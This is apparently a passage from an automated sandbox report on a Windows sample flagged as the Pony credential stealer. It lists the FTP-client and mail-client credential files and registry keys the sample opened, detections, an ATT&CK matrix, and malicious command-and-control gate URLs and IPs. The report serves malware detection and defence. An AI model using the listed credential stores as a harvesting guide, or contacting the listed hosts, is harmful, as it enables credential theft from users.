          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Roaming\TurboFTP\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Local\FTPInfo\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Roaming\FTP Explorer\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\ProgramData\INSoftware\NovaFTP\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Roaming\RhinoSoft.com\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\ProgramData\FTP Explorer\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\ProgramData\FTPGetter\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Roaming\Frigate3\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Program Files (x86)\CuteFTP\sm.datJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Local\ExpanDrive\drives.jsJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Roaming\SharedSettings_1_0_5.ccsJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\ProgramData\CuteFTP\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Roaming\CuteFTP\sm.datJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Roaming\FlashFXP\4\Quick.datJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: HKEY_LOCAL_MACHINE\Software\WOW6432Node\TurboFTPJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\ProgramData\SmartFTP\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: HKEY_CURRENT_USER\Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Local\FlashFXP\3\Quick.datJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: HKEY_CURRENT_USER\Software\FTP Explorer\ProfilesJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Roaming\ExpanDrive\drives.jsJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\ProgramData\GlobalSCAPE\CuteFTP Pro\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Local\Estsoft\ALFTP\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Roaming\BlazeFtp\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Pro\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\ProgramData\Frigate3\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: HKEY_CURRENT_USER\Software\MAS-Soft\FTPInfo\SetupJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\ProgramData\FileZilla\sitemanager.xmlJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\ProgramData\CoffeeCup Software\SharedSettings.sqliteJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings.sqliteJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\ProgramData\TurboFTP\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings.ccsJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Lite\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP\sm.datJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Local\SmartFTP\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Roaming\NetSarang\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\ProgramData\GlobalSCAPE\CuteFTP\sm.datJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Roaming\FlashFXP\3\Quick.datJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\ProgramData\FlashFXP\3\Quick.datJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\ProgramData\Estsoft\ALFTP\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Roaming\INSoftware\NovaFTP\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\ProgramData\GlobalSCAPE\CuteFTP Pro\sm.datJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\ProgramData\ExpanDrive\drives.jsJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xmlJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Local\TurboFTP\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Local\FlashFXP\4\Quick.datJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Local\LeapWare\LeapFTP\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\ProgramData\CuteFTP\sm.datJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Local\BitKinex\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP\sm.datJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Roaming\FlashFXP\3\Sites.datJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings_1_0_5.sqliteJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Local\FTPRush\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetter\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Roaming\BitKinex\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\ProgramData\FlashFXP\3\Sites.datJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Local\GHISLER\wcx_ftp.iniJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Local\BlazeFtp\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Pro\sm.datJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Local\NetSarang\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbarJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbarJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\ProgramData\SharedSettings.sqliteJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\ProgramData\AceBIT\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\ProgramData\GlobalSCAPE\CuteFTP\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Local\AceBIT\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Roaming\FlashFXP\4\Sites.datJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\ProgramData\CoffeeCup Software\SharedSettings_1_0_5.sqliteJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Pro\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Windows\32BitFtp.iniJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Local\SharedSettings_1_0_5.ccsJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Pro\sm.datJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Lite\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\ProgramData\FlashFXP\4\Quick.datJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Local\FileZilla\filezilla.xmlJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\ProgramData\3D-FTP\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\ProgramData\NetSarang\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbarJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Roaming\GPSoftware\Directory Opus\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Local\FTP Explorer\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\ProgramData\FTPRush\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbarJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\wcx_ftp.iniJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Roaming\Estsoft\ALFTP\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Local\SharedSettings.ccsJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Local\Frigate3\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Roaming\CuteFTP\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\ProgramData\GlobalSCAPE\CuteFTP Lite\sm.datJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\ProgramData\FlashFXP\3\History.datJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfo\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: HKEY_LOCAL_MACHINE\Software\TurboFTPJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Pro\sm.datJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\ProgramData\FlashFXP\4\History.datJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\ProgramData\CoffeeCup Software\SharedSettings_1_0_5.ccsJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Windows\wcx_ftp.iniJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Local\CuteFTP\sm.datJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Lite\sm.datJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Local\FlashFXP\3\Sites.datJump to behavior
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet SettingsJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
          Tries to steal Mail credentials (via file registry)
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeCode function: RegOpenKeyA,RegEnumKeyExA,RegCloseKey, PopPassword3_2_0040EBA3
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeCode function: RegOpenKeyA,RegEnumKeyExA,RegCloseKey, SmtpPassword3_2_0040EBA3

          Remote Access Functionality

          barindex
          Yara detected Pony
          Source: Yara matchFile source: 3.2.AxgZVzUv8m.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.AxgZVzUv8m.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: AxgZVzUv8m.exe PID: 2744, type: MEMORYSTR

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information1
          Scripting          		1
          Valid Accounts          		11
          Native API          		1
          Scripting          		1
          DLL Side-Loading          		1
          Disable or Modify Tools          		2
          OS Credential Dumping          		1
          Account Discovery          		Remote Services1
          Archive Collected Data          		1
          Ingress Tool Transfer          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/Job1
          DLL Side-Loading          		1
          Valid Accounts          		1
          Deobfuscate/Decode Files or Information          		2
          Credentials in Registry          		3
          File and Directory Discovery          		Remote Desktop Protocol2
          Data from Local System          		2
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAt1
          Valid Accounts          		11
          Access Token Manipulation          		3
          Obfuscated Files or Information          		Security Account Manager24
          System Information Discovery          		SMB/Windows Admin Shares1
          Email Collection          		2
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook111
          Process Injection          		1
          Install Root Certificate          		NTDS1
          Security Software Discovery          		Distributed Component Object ModelInput Capture112
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
          Software Packing          		LSA Secrets1
          Virtualization/Sandbox Evasion          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          DLL Side-Loading          		Cached Domain Credentials2
          Process Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          Valid Accounts          		DCSync1
          Application Window Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          Virtualization/Sandbox Evasion          		Proc Filesystem1
          System Owner/User Discovery          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
          Access Token Manipulation          		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron111
          Process Injection          		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          AxgZVzUv8m.exe61%ReversingLabsByteCode-MSIL.Trojan.Zilla
          AxgZVzUv8m.exe100%AviraHEUR/AGEN.1311807
          AxgZVzUv8m.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.ibsensoftware.com/0%URL Reputationsafe
          http://dillion0mill.favcc1.com/gate.phphttp://dillion0mill.favcc1.com/gate.phpYUIPWDFILE0YUIPKDFILE0100%Avira URL Cloudmalware
          http://https://ftp://operawand.dat_Software0%Avira URL Cloudsafe
          ftp://http://https://ftp.fireFTPsites.datSeaMonkey0%Avira URL Cloudsafe
          http://ww25.dillion0mill.favcc1.com/gate.php?subid1=20240820-0043-4362-acc8-bed20fff9940100%Avira URL Cloudmalware
          http://dillion0mill.favcc1.com/gate.php100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          77026.bodis.com
          		199.59.243.226
          		truetrue
            		unknown
            dillion0mill.favcc1.com
            		103.224.212.212
            		truetrue
              		unknown
              ww25.dillion0mill.favcc1.com
              		unknown
              		unknowntrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://ww25.dillion0mill.favcc1.com/gate.php?subid1=20240820-0043-4362-acc8-bed20fff9940true
                • Avira URL Cloud: malware
                		unknown
                http://dillion0mill.favcc1.com/gate.phptrue
                • Avira URL Cloud: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://https://ftp://operawand.dat_SoftwareAxgZVzUv8m.exe, 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://dillion0mill.favcc1.com/gate.phphttp://dillion0mill.favcc1.com/gate.phpYUIPWDFILE0YUIPKDFILE0AxgZVzUv8m.exe, 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                ftp://http://https://ftp.fireFTPsites.datSeaMonkeyAxgZVzUv8m.exe, 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.ibsensoftware.com/AxgZVzUv8m.exe, AxgZVzUv8m.exe, 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                103.224.212.212
                		dillion0mill.favcc1.comAustralia
                		133618TRELLIAN-AS-APTrellianPtyLimitedAUtrue
                199.59.243.226
                		77026.bodis.comUnited States
                		395082BODIS-NJUStrue

                General Information

                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1495035
                Start date and time:2024-08-19 16:42:23 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 7m 59s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:11
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:AxgZVzUv8m.exe
                renamed because original name is a hash value
                Original Sample Name:0dc91d39870a081f44b8429dcfbc223f.exe
                Detection:MAL
                Classification:mal100.troj.spyw.evad.winEXE@7/1@2/2
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 141
                • Number of non-executed functions: 39
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Override analysis time to 240000 for current running targets taking high CPU consumption

                Warnings

                • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, 4.8.2.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.0.0.2.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                • Report size getting too big, too many NtSetInformationFile calls found.
                • VT rate limit hit for: AxgZVzUv8m.exe

                Simulations

                Behavior and APIs

                TimeTypeDescription
                10:44:50API Interceptor142459x Sleep call for process: conhost.exe modified

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                103.224.212.212RFQ31072024_August order_pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                • www.startable.online/ss24/?Vt=zMEVcHBGt47G6KX5esEX8dtG6+lnOeOio8+YHkIF/aeZvdpFgNK9qxVPP7cqFgvwi0y6&Rxl=8pdPF640TxI0Gb
                po8909893299832.exeGet hashmaliciousFormBookBrowse
                • www.trexendofparadise.club/hd05/?mJBXxJ=86lIbpVB0TF+ypCCh2xJS80hbaRwufvG1BxjW4BS/DAeytVMDvWI/cAJk8pGccQXRyse&_hrl=jxopsZ
                Details of Your Etisalat Summary Bill for the Month of May 2024.exeGet hashmaliciousFormBookBrowse
                • www.vietcadao.com/da29/?6l=Q7am8il/nsWle9qVrlpo40N7hUEpDQa8XY45vE38HJwrUpInQsvntdacZL4kVj7U+7+N&2dqhl=R2MlVxP8ert
                jqPZZhDmjh.exeGet hashmaliciousFormBookBrowse
                • www.theanhedonia.com/gy14/?Szu8Zp=sJB9xXDMLUearYsOJfMPyoOL09k0Ht7qJDXT7N+Z0c0oohLZUl68J6Fs60bzmHjgtnYtuzz0MQ==&3fzlqX=DtjxV
                z2______________________________.exeGet hashmaliciousFormBookBrowse
                • www.theanhedonia.com/gy14/?MRmX=sJB9xXC4L0bq2ox6VvMPyoOL09k0Ht7qJDXT7N+Z0c0oohLZUl68J6Fs633JlGPbuQ58&J61h=CBZhCFnx-
                file.exeGet hashmaliciousLummaC, Glupteba, PureLog Stealer, RisePro Stealer, SmokeLoader, Stealc, zgRATBrowse
                • soclaiebn.xyz/PhpMyAdmin/
                22#U0415.exeGet hashmaliciousFormBookBrowse
                • www.theanhedonia.com/gy14/?8pB8=qN98lNP8T4bXSv70&NBZlJ=sJB9xXC4L0bq2ox6VvMPyoOL09k0Ht7qJDXT7N+Z0c0oohLZUl68J6Fs633JlGPbuQ58
                RFQ-T56797W_1.xlsxGet hashmaliciousFormBook, NSISDropperBrowse
                • www.narrativepages.com/ge06/?6l58L2=/ya+08xkyOEL3z3mbFI+CcZs6Ll5ZIz+eS70dlN8tW9HOdaiVOhFBqrIR4wo06Sw4yKSnA==&BL3=KP-PB41
                GCeHcfCef8.exeGet hashmaliciousFormBookBrowse
                • www.fhstbanknigeria.com/rs10/?s0=3hcrZOpg0bcnkhh15AgNBYOBAaFzA2w39b7OLOTzLX17gT7vmmZNER029cGGSq2teP1k&CB_=7nEpdJs
                Audit_Confirmation_pdf.exeGet hashmaliciousFormBookBrowse
                • www.brynnwpods.com/ls02/?U2MTG=IjLtFX-X1ru86jf&rrn=BOXRJAyFp7ak5hNUAxrCPIqjpri6yIqDhPKfVNEe46v/rpGYXPOMCZCFlinyM3iKXNZy
                199.59.243.226http://survey-smiles.comGet hashmaliciousUnknownBrowse
                • survey-smiles.com/_tr
                PO TIYEY078K.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                • www.hostem24.shop/fukx/
                Pro#U015bba o Wycena - Strony 4-6.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                • www.foundation-repair.biz/enra/
                DHL 0009485777.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                • www.headwayboxing.fitness/4eb2/
                !2#4.exeGet hashmaliciousFormBookBrowse
                • www.bayhouse1701.com/hxvd/?NXK=k644bhNH&IRHpZ0L0=qd4Zpt50Lu5tMbNJQTMpS7oMmCTuU6EzQc4kFjSJopTfdU0R/nTa5a+VojLluLlHxeFLm3FN9O8FFxpuHk4stYpxalMNmfc+toRZtCZE12UasnkDalgV/4c=
                https://www.regionvictoriaville.com/page/?ContentID=1257Get hashmaliciousUnknownBrowse
                • ww25.complexesacrecoeur.com/_tr
                http://mapwuest.comGet hashmaliciousUnknownBrowse
                • ww25.mapwuest.com/_tr
                rPHOTO09AUG2024.exeGet hashmaliciousFormBookBrowse
                • www.joyesi.xyz/fo8o/
                http://survey-smiles.com/Get hashmaliciousUnknownBrowse
                • survey-smiles.com/_tr
                http://survey-smiles.com/Get hashmaliciousUnknownBrowse
                • survey-smiles.com/_tr

                Domains

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                77026.bodis.comhttps://www.regionvictoriaville.com/page/?ContentID=1257Get hashmaliciousUnknownBrowse
                • 199.59.243.226
                https://emv1.jo333.com/Get hashmaliciousUnknownBrowse
                • 199.59.243.226
                https://www.jo333.com/Get hashmaliciousUnknownBrowse
                • 199.59.243.226
                https://emv1.lqhyhy.cn/Get hashmaliciousUnknownBrowse
                • 199.59.243.226
                https://www.pnxubwf.cn/Get hashmaliciousUnknownBrowse
                • 199.59.243.226
                http://costpointfoundations.coGet hashmaliciousUnknownBrowse
                • 199.59.243.226
                LisectAVT_2403002A_327.dllGet hashmaliciousWannacryBrowse
                • 199.59.243.226
                Ia93PTYivQ.exeGet hashmaliciousBlackMoon, NeshtaBrowse
                • 199.59.243.226
                gUJak0onLk.elfGet hashmaliciousUnknownBrowse
                • 199.59.243.226
                yrBA01LVo2.exeGet hashmaliciousWannacryBrowse
                • 199.59.243.226

                ASNs

